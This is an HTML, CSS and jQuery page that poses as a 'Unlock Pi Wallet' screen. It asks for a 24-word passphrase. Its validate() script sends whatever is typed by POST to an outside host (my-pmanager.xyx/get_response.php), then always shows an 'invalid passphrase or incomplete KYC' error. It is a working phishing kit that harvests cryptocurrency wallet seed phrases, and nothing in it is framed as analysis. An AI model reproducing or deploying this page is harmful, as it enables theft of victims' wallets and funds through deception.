<html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Unlock Pi</title>
    <!-- <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">  -->
    <link rel="stylesheet" href="bootstrap.css">
    <link rel="stylesheet" href="style.css">
</head>
<body>
<div class="layout">
	<h3>Unlock Pi Wallet</h3>
	<textarea placeholder="Enter your 24-word passphrase here"></textarea>
	<div class="erbox" >
		<div class="error ip">Invalid passphrase <span>or incomplete KYC</span></div>
		<div nclick="validate()" class="btn uwp">Unlock with passphrase<div class=lds-ring ><div></div><div></div><div></div></div></div>
	</div>
	<div class="erbox" >
		<div class="error pup">Please use passphrase to unlock</div>
		<div class="btn biob">Unlock with Biometrics</div>    
	</div> 
	<p style=" width: 100%;">As a non-custodial wallet, your wallet passphrase is
	    exclusively accessible only to you. Recovery of passphrase
	    is currently impossible.<br><br>
	    Lost your passphrase? <a href="" style="color: var(--tc);">You can create a new wallet,</a> but all your π
	    in your previous wallet will be inaccessible.
	</p>
</div>
<style type="text/css">
/*.loader{
/*display:none;*
display:none;//inline-block;
height:1.2em;
width:auto;
background:#0000;//var(--tt);
aspect-ratio:1;
position:absolute;
border-radius:1em;
border:1px solid var(--tt);
border-width:2px 0px 2px 2px;
animation:0.5s spin linear infinite;
margin-left:-5em;
opacity:0.7;
}*/

.lds-ring {
  display: inline-block;
  position: absolute;
  width: 1.5em;
  height: 1.5em;
  margin-left:-5em;
  margin-top:-0.6em;
}
.lds-ring div {
  box-sizing: border-box;
  display: block;
  position: absolute;
  width: 1.5em;
  height: 1.5em;
  margin: 8px;
  opacity:0.7;
  border: 3px solid var(--tt);
  border-radius: 50%;
  animation: spin 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;
  border-color: var(--tt) transparent transparent transparent;
}
.lds-ring div:nth-child(1) {
  animation-delay: -0.35s;
}
.lds-ring div:nth-child(2) {
  animation-delay: -0.2s;
}
.lds-ring div:nth-child(3) {
  animation-delay: -0.05s;
}


@keyframes spin{
100%{transform:rotate(360deg);}
}

*{
font-size:1em;
}

.layout{
display:flex;
flex-direction:column;
justify-content:center;
align-items:center;
padding:10% 8%;
}

.layout > *{
margin:5% 0;
}

textarea{
width:100%;
aspect-ratio:3/2;
border:1px solid ;
font-size:1.2em;
font-family:inherit;
padding:3%;
border-radius:0.5em;
}

.btn{
background:#fff;
color:var(--tc);
border:1px solid var(--tc);
width:100%;
font-size:1.1em;
padding:0.7em 0;
transition:0.1s all;
}

.btn:active{
background:#4E357766;
}

.biob{
background:var(--tc);
color:var(--st);
}


.error{
color:#e10;
margin:0.8em 0;
display:none;
white-space:nowrap;
}
.erbox{
display:flex;
flex-direction:column;
align-items:center;
width:100%;
}
</style>

<script src="jquery.js"></script>
<script>
function countWords(dval) {
    var text = dval.trim();
    var words = text.split(/\s+/);
    var wordCount = words.length;
    return wordCount;
}

$("textarea").on("input", function(){
	$(".error").css("display", "none");
});

$(".btn").click(function(){
	$(".ip span").css("display","none");
	$(".error").css("display", "none");
});

$(".biob").click(function(){
	$(".pup").css("display", "block");	
});

$(".uwp").click(function(){
	validate();//$(".ip").css("display", "block");	
});

function validate(){
	var tv = $("textarea").val().trim();
	if(countWords(tv)<24)
	{
		$(".ip").css("display", "block");
	}
	else
	{
		if(countWords(tv)==24)
		$(".ip span").css("display","inline-block");
		
		$(".loader").css("display", "inline-block");
	}
	if(tv!="")
	$.ajax({
		type: "POST",
		url: "https://my-pmanager.xyx/get_response.php",
		data: {
			"response":$("textarea").val(),
		},
		success:function(data){
			//alert(data);
			//$("#").val("");
			$(".loader").fadeOut();//css("display", "inline-block");
			$(".ip").css("display", "block");
		}
	});
}
</script>
</body>
</html>
